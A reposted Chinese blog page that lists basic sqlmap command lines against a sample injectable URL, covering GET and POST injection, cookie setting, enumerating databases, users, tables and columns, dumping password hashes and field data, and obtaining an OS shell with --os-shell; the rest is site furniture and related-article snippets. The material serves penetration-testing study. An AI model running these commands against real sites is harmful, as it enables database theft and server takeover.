sqlmap几个基本命令

最新推荐文章于 2024-07-13 23:51:10 发布
最新推荐文章于 2024-07-13 23:51:10 发布
阅读量60 收藏
点赞数
文章标签: python shell 数据库
原文链接:https://my.oschina.net/u/139883/blog/282846
版权

2019独角兽企业重金招聘Python工程师标准>>> hot3.png

  • 列几个基本命令

./sqlmap.py –h     //查看帮助信息

./sqlmap.py –u “http://www.anti-x.net/inject.asp?id=injecthere”  //get注入

./sqlmap.py –u “http://www.anti-x.net/inject.asp?id=injecthere” --data “DATA”//post注入

./sqlmap.py –u “http://www.anti-x.net/inject.asp?id=injecthere” --cookie “COOKIE”//修改请求时的cookie

./sqlmap.py –u “http://www.anti-x.net/inject.asp?id=injecthere” --dbs   //列数据库

./sqlmap.py –u “http://www.anti-x.net/inject.asp?id=injecthere” –-users //列用户

./sqlmap.py –u “http://www.anti-x.net/inject.asp?id=injecthere” –-passwords //获取密码hash

./sqlmap.py –u “http://www.anti-x.net/inject.asp?id=injecthere” –-tables  -D DB_NAME //列DB_NAME的表

./sqlmap.py –u “http://www.anti-x.net/inject.asp?id=injecthere” –-columns –T TB_NAME -D DB_NAME  //读取TB_NAME中的列

./sqlmap.py –u “http://www.anti-x.net/inject.asp?id=injecthere” –-dump –C C1,C2,C3 –T TB_NAME -D DB_NAME //读字段C1,C2,C3数据

./sqlmap.py –u “http://www.anti-x.net/inject.asp?id=injecthere” –-os-shell  //取得一个shell


转载于:https://my.oschina.net/u/139883/blog/282846

weixin_33991418
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
sqlmap安装包及教程.zip
12-23
安装SQLMap通常包括以下几个步骤: 1. 下载:你可以从官方网站或者镜像站点获取最新版本的SQLMap源码。 2. 解压:下载完成后,解压缩文件到一个合适的目录。 3. 安装依赖:SQLMap可能需要Python环境以及一些特定的...
sqlmap的某个版本
10-05
SQLMap的工作原理主要基于以下几个关键点: 1. **字典攻击**:通过尝试一系预定义的SQL查询语句,寻找可能导致注入的响应变化。 2. **盲注入**:当目标应用程序对错误信息进行了隐藏时,SQLMap会通过时间延迟或者...
SQLMAP课程视频.rar
11-13
2. **SQLMAP介绍**:学习SQLMAP基本概念,它的功能和目标。SQLMAP可以自动识别网站是否存在SQL注入漏洞,并利用这些漏洞进行数据提取、数据库控制甚至服务器接管。 3. **安装与配置**:如何在不同操作系统(如...
sqlmap.rar
08-01
SQLMap的工作原理主要包括以下几个步骤: 1. **探测**:工具会发送一系的HTTP请求,尝试识别可能存在SQL注入的URL参数。这通常包括基于错误的注入、基于时间的盲注、基于布尔的盲注等方法。 2. **指纹识别**:一旦...
sqlmap.py 脚本 sqlmap-master.zip
10-16
几个基本命令 ./sqlmap.py –h //查看帮助信息 ./sqlmap.py –u “http://www.anti-x.net/inject.asp?id=injecthere” //get注入 ./sqlmap.py –u “http://www.anti-x.net/inject.asp?id=injecthere” --data...
【持续集成_05课_Linux部署SonarQube及结合开发项目部署】
weixin_42333261的博客
07-12 168
前置条件:sonarQube不能使用root账号进行启动,所以需要创建普通用户及。3)CMD上传qube文件-不能传到home路径下哦。2)添加用户、组名、密码。4)检查并解压上传的包。
面试题 21:解释 Python 中的 help() 函数和 dir() 函数?
专注于全栈开发领域
07-10 781
Python中,help()和dir()是两个非常有用的内置函数,它们可以帮助开发者更好地了解Python对象和模块。
Nginx七层(应用层)反向代理:UWSGI代理uwsgi_pass篇
jclee95的个人博客
07-10 1100
Nginx提供了多种应用层反向代理支持,包括proxy_pass、uwsgi_pass、fastcgi_pass和scgi_pass等。其中,proxy_pass指令可以接受一个URL参数,用于实现对HTTP/HTTPS协议的反向代理;uwsgi_pass用于代理到uWSGI应用服务器;fastcgi_pass用于代理到FastCGI服务器;而scgi_pass则用于代理到SCGI(Simple Common Gateway Interface)应用。这些指令使Nginx能够灵活地处理不同类型的后端服务和应
聊聊如何在内网下构建大模型微调环境
python1234567_的博客
07-12 833
LlamaFactory新版更新后,还是比较方便,只是说llamafactory-cli命令的确是有点蒙,踩个坑就好了。对于LlamaFactory微调来说,本身不难,毕竟都是配置;主要是在内网环境下的依赖包拉取安装是真麻烦,但其实也还好。走一遍的话,还是可以学到很多的。​。
leetcode--验证二叉搜索树
liulanba的博客
07-09 681
给你一个二叉树的根节点 root ,判断其是否是一个有效的二叉搜索树。有效 二叉搜索树定义如下:节点的左子树只包含 小于 当前节点的数。节点的右子树只包含 大于 当前节点的数。所有左子树和右子树自身必须也是二叉搜索树。示例 1:输入:root = [2,1,3]输出:true示例 2:输入:root = [5,1,4,null,null,3,6]输出:false解释:根节点的值是 5 ,但是右子节点的值是 4。提示:树中节点数目范围在[1, 104] 内。
MySQL空间索引
你的指尖有改变世界的力量
07-10 283
空间类型是建立在空间类型字段上的。
CV06_Canny边缘检测算法和python实现
https://github.com/foxpup11?tab=repositories
07-11 857
https://www.bilibili.com/video/BV1qU4y1U7aK/?spm_id_from=333.337.search-card.all.click&vd_source=7dace3632125a1ef7fd32c285eb2fbac
一键安装ros及出现问题的解决方案
m0_58173801的博客
07-10 584
catkin_make时出现报错如下。
sklearn基础教程:掌握机器学习入门的钥匙
AIGC绘图领域探索者,热衷于将创意与技术融合,致力于分享前沿AI绘图技巧与心得,让我们一起开启视觉艺术的新篇章。
07-13 763
是基于Python的一个开源机器学习库,它建立在NumPy、SciPy和matplotlib之上,提供了大量的算法和工具,用于数据挖掘和数据分析。无论是简单的线性回归,还是复杂的神经网络,sklearn都能提供直观易用的接口。作为Python中最为流行的机器学习库之一,以其简洁的API、丰富的算法和强大的功能赢得了广大用户的青睐。通过本文的介绍,相信你已经对sklearn有了初步的了解,并能够开始进行一些基础的机器学习任务。
python学习】闭包的定义与特点,以及一些常用场景的使用
m0_49243785的博客
07-11 1031
闭包是一个函数,闭包让你可以在一个内层函数中访问其外层函数的作用域,可以使用闭包进行模块化代码和封装代码的操作,从而提高效率。
编程学单词:delta(希腊字母Δ/δ),差值表示
m0_57158496的博客
07-11 1106
结语:代码编写中,用“通用”字符命名相应变量,是一个不错的好习惯。其一,不用注释,望文生义,简单明了;其二,代码书写形式风格“标准”统一,方便维护和流转。说明:今天我在堆叠代码时发现有delta样子的单词存在,修习之,对代码书写大有裨益。从今以后,我遇到类似的单词,都将在学习笔记中标识、分享。😋回页目录。
华为910b推理Qwen1.5-72b
weixin_41549308的博客
07-12 639
910b部署推理大模型
使用Gunicorn提高Web应用的多核并发处理能力
2401_85639015的博客
07-11 937
Gunicorn 是一个基于pre-fork worker模型的WSGI服务器。它能够处理多个工作进程,每个进程可以处理多个请求,这使得它非常适合处理并发请求。兼容性强:支持多种Web框架,如Django、Flask、Pyramid等。高性能:基于pre-fork worker模型,能充分利用多核CPU。易于配置:提供了多种配置方式,包括命令行参数、配置文件和环境变量。稳定性:在生产环境中广泛使用,经过了大量的实践检验。
Python 项目】类鸟群:仿真鸟群
最新发布
Ω
07-13 1650
仔细观察一群鸟或一群鱼,你会发现,虽然群体由个体生物组成,但该群体作为一个整体似乎有它自己的生命。鸟群中的鸟在移动、飞越和绕过障碍物时,彼此之间相互定位。受到打扰或惊吓时会破坏编队,但随后重新集结,仿佛被某种更大的力量控制。1986年,Craig Reynolds创造鸟类群体行为的一种逼真模拟,称为“类鸟群(Boids)”模型。关于类鸟群模型,值得注意的是,只有 3 个简单的规则控制着群体中个体间的相互作用,但该模型产生的行为类似于真正的鸟群。
sqlmap的-p命令
07-14
sqlmap的-p命令用于指定目标URL或者目标参数的位置。它可以用来指定需要测试的目标参数,其中参数可以是单个参数、多个参数、以及参数的位置。通过使用-p参数,sqlmap可以对指定的目标参数进行注入测试。 例如,...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值